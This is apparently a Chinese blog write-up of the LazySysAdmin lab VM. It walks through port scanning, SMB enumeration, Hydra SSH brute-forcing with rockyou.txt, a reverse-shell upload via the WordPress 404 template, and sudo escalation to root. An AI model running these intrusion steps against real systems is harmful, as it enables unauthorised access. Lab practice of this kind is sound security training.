信息收集
打开虚拟机
直接扫描全网段 找到IP地址
┌──(root㉿kali)-[~]
└─# nmap -sN -T4 192.168.59.137
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-01 05:32 EDT
Nmap scan report for 192.168.59.137
Host is up (0.00028s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http
139/tcp open|filtered netbios-ssn
445/tcp open|filtered microsoft-ds
3306/tcp open|filtered mysql
6667/tcp open|filtered irc
MAC Address: 00:0C:29:12:7D:D2 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.71 seconds
网段扫描完了用端口扫描,看一下都哪些端口开了,并且都什么服务
使用枚举检查一下共享文件夹 因为开启了139端口
──(root㉿kali)-[/usr/share/wordlists]
└─# enum4linux 192.168.59.137
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Jul 1 06:37:25 2024
=========================================( Target Information )=========================================
Target ........... 192.168.59.137
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
发现了没有账号密码的共享文件夹,通过共享文件夹找到了Admin的密码。
威胁建模,漏洞分析
找了一下80端口,使用dirb扫描的比较全,dirsearch没扫到需要的东
┌──(root㉿kali)-[~]
└─# dirb http://192.168.59.137
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Jul 1 05:52:22 2024
URL_BASE: http://192.168.59.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.59.137/ ----
==> DIRECTORY: http://192.168.59.137/apache/
+ http://192.168.59.137/index.html (CODE:200|SIZE:36072)
+ http://192.168.59.137/info.php (CODE:200|SIZE:77268)
==> DIRECTORY: http://192.168.59.137/javascript/
==> DIRECTORY: http://192.168.59.137/old/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/
+ http://192.168.59.137/robots.txt (CODE:200|SIZE:92)
+ http://192.168.59.137/server-status (CODE:403|SIZE:294)
==> DIRECTORY: http://192.168.59.137/test/
==> DIRECTORY: http://192.168.59.137/wordpress/
==> DIRECTORY: http://192.168.59.137/wp/
---- Entering directory: http://192.168.59.137/apache/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/javascript/ ----
==> DIRECTORY: http://192.168.59.137/javascript/jquery/
---- Entering directory: http://192.168.59.137/old/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/phpmyadmin/ ----
+ http://192.168.59.137/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.59.137/phpmyadmin/index.php (CODE:200|SIZE:8263)
==> DIRECTORY: http://192.168.59.137/phpmyadmin/js/
+ http://192.168.59.137/phpmyadmin/libraries (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/
+ http://192.168.59.137/phpmyadmin/phpinfo.php (CODE:200|SIZE:8265)
+ http://192.168.59.137/phpmyadmin/setup (CODE:401|SIZE:460)
==> DIRECTORY: http://192.168.59.137/phpmyadmin/themes/
---- Entering directory: http://192.168.59.137/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/wordpress/ ----
+ http://192.168.59.137/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.59.137/wordpress/wp-admin/
==> DIRECTORY: http://192.168.59.137/wordpress/wp-content/
==> DIRECTORY: http://192.168.59.137/wordpress/wp-includes/
+ http://192.168.59.137/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.59.137/wp/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/javascript/jquery/ ----
+ http://192.168.59.137/javascript/jquery/jquery (CODE:200|SIZE:252879)
+ http://192.168.59.137/javascript/jquery/version (CODE:200|SIZE:5)
---- Entering directory: http://192.168.59.137/phpmyadmin/js/ ----
==> DIRECTORY: http://192.168.59.137/phpmyadmin/js/jquery/
---- Entering directory: http://192.168.59.137/phpmyadmin/locale/ ----
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/ar/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/bg/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/ca/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/cs/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/da/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/de/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/el/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/es/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/et/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/fi/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/fr/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/gl/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/hi/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/hr/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/hu/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/id/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/it/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/ja/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/ko/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/lt/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/nl/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/pl/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/pt/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/pt_BR/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/ro/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/ru/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/si/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/sk/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/sl/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/sv/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/th/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/tr/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/uk/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/zh_CN/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/locale/zh_TW/
---- Entering directory: http://192.168.59.137/phpmyadmin/themes/ ----
==> DIRECTORY: http://192.168.59.137/phpmyadmin/themes/original/
---- Entering directory: http://192.168.59.137/wordpress/wp-admin/ ----
+ http://192.168.59.137/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.59.137/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.59.137/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.59.137/wordpress/wp-admin/includes/
+ http://192.168.59.137/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.59.137/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.59.137/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.59.137/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.59.137/wordpress/wp-admin/user/
---- Entering directory: http://192.168.59.137/wordpress/wp-content/ ----
+ http://192.168.59.137/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.59.137/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.59.137/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.59.137/wordpress/wp-content/upgrade/
==> DIRECTORY: http://192.168.59.137/wordpress/wp-content/uploads/
---- Entering directory: http://192.168.59.137/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
----
---- Entering directory: http://192.168.59.137/phpmyadmin/locale/zh_TW/ ----
---- Entering directory: http://192.168.59.137/phpmyadmin/themes/original/ ----
==> DIRECTORY: http://192.168.59.137/phpmyadmin/themes/original/css/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/themes/original/img/
==> DIRECTORY: http://192.168.59.137/phpmyadmin/themes/original/jquery/
---- Entering directory: http://192.168.59.137/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/wordpress/wp-admin/network/ ----
+ http://192.168.59.137/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.59.137/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.59.137/wordpress/wp-admin/user/ ----
+ http://192.168.59.137/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.59.137/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.59.137/wordpress/wp-content/plugins/ ----
+ http://192.168.59.137/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.59.137/wordpress/wp-content/themes/ ----
+ http://192.168.59.137/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.59.137/wordpress/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.59.137/phpmyadmin/themes/original/css/ ----
---- Entering directory: http://192.168.59.137/phpmyadmin/themes/original/img/ ----
---- Entering directory: http://192.168.59.137/phpmyadmin/themes/original/jquery/ ----
==> DIRECTORY: http://192.168.59.137/phpmyadmin/themes/original/jquery/images/
---- Entering directory: http://192.168.59.137/phpmyadmin/themes/original/jquery/images/ ----
-----------------
END_TIME: Mon Jul 1 05:55:10 2024
DOWNLOADED: 253660 - FOUND: 22
发现一个页面,以及cms WordPress,开源框架
又找到一个登录页面
http://192.168.59.137/wordpress/wp-login.php?redirect_to=http%3A%2F%2F192.168.59.137%2Fwordpress%2Fwp-admin%2F&reauth=1
使用美杜莎没用明白,用了一下kali自带的字典rockyou.txt
┌──(root㉿kali)-[~]
└─# medusa -h 192.168.59.137 -u togie -p /usr/share/wordlists/rockyou.txt -M ssh
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ssh] Host: 192.168.59.137 (1 of 1, 0 complete) User: togie (1 of 1, 0 complete) Password: /usr/share/wordlists/rockyou.txt (1 of 1 complete)
九头蛇好用
┌──(root㉿kali)-[~]
└─# hydra -l togie -P /usr/share/wordlists/rockyou.txt ssh://192.168.59.137 -t 4
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-01 06:26:46
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://192.168.59.137:22/
[22][ssh] host: 192.168.59.137 **login: togie password: 12345**
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-07-01 06:27:06
登录页需要密码,发现用户名是Admin
因为端口中开启了smb服务,试一下远程连接,直接链接进去了,
渗透攻击
smb 远程文件共享链接
mount -t cifs -o username=’’,password=’’ //192.168.69.137/share$ /mnt
远程之后再找WordPress配置文件
user:Admin
password:TogieMYSQL12345^^
打开WordPress中404界面把反弹shell脚本传上去
翻找目录找到了404文件所在位置
开启nc监听,访问文件
进入系统了
访问一下是www-data
使用python编译进入bash页面
python -c "import pty;pty.spawn('/bin/bash')"
- 使用ssh链接
┌──(root㉿kali)-[~]
└─# ssh togie@192.168.59.137
The authenticity of host '192.168.59.137 (192.168.59.137)' can't be established.
ED25519 key fingerprint is SHA256:95rO1jtge1Ag8dmmSGET2f806aQjiTODoBpDoEeefaw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? y
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '192.168.59.137' (ED25519) to the list of known hosts.
##################################################################################################
# Welcome to Web_TR1 #
# All connections are monitored and recorded #
# Disconnect IMMEDIATELY if you are not an authorized user! #
##################################################################################################
togie@192.168.59.137's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Mon Jul 1 20:27:04 AEST 2024
System load: 0.0 Processes: 181
Usage of /: 47.5% of 2.89GB Users logged in: 0
Memory usage: 38% IP address for eth0: 192.168.59.137
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical.com/
133 packages can be updated.
0 updates are security updates.
togie@LazySysAdmin:~$ ls
togie@LazySysAdmin:~$ whoami
togie
togie@LazySysAdmin:~$ ls
togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
togie@LazySysAdmin:~$ sudo su root
[sudo] password for togie:
root@LazySysAdmin:/home/togie# ls
root@LazySysAdmin:/home/togie# dir
root@LazySysAdmin:/home/togie# cd
root@LazySysAdmin:~# ls
proof.txt
root@LazySysAdmin:~# cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
Well done :)
Hope you learn't a few things along the way.
Regards,
Togie Mcdogie
Enjoy some random strings
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
直接找到了flag
后渗透提权
togie@LazySysAdmin:~$ ls
togie@LazySysAdmin:~$ whoami
togie
togie@LazySysAdmin:~$ ls
togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
togie@LazySysAdmin:~$ sudo su root
[sudo] password for togie:
root@LazySysAdmin:/home/togie# ls
root@LazySysAdmin:/home/togie# dir
root@LazySysAdmin:/home/togie# cd
root@LazySysAdmin:~# ls
proof.txt
root@LazySysAdmin:~# cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
Well done :)
Hope you learn't a few things along the way.
Regards,
Togie Mcdogie
Enjoy some random strings
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
root@LazySysAdmin:~#
拿下flag
总结
首先是采用不同的扫描器先扫网段在扫端口,都扫完了,看看开了什么服务。
先试一下80端口,毕竟是有界面的,但是相对麻烦,个人感觉毕竟是通过web应用来连接,不如ssh远程来的快
再试一下22端口,ssh链接,使用了九头蛇暴力破解账号密码,原因是弱口令密码,链接上一本万利,可以节省很多步骤
再就是139端口,可以共享文件夹,找到了Admin的密码以及方便80端口配置404页面
别人都是根据经验经验来的,所以要多打靶,多练习多实践。
扫一扫
355
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
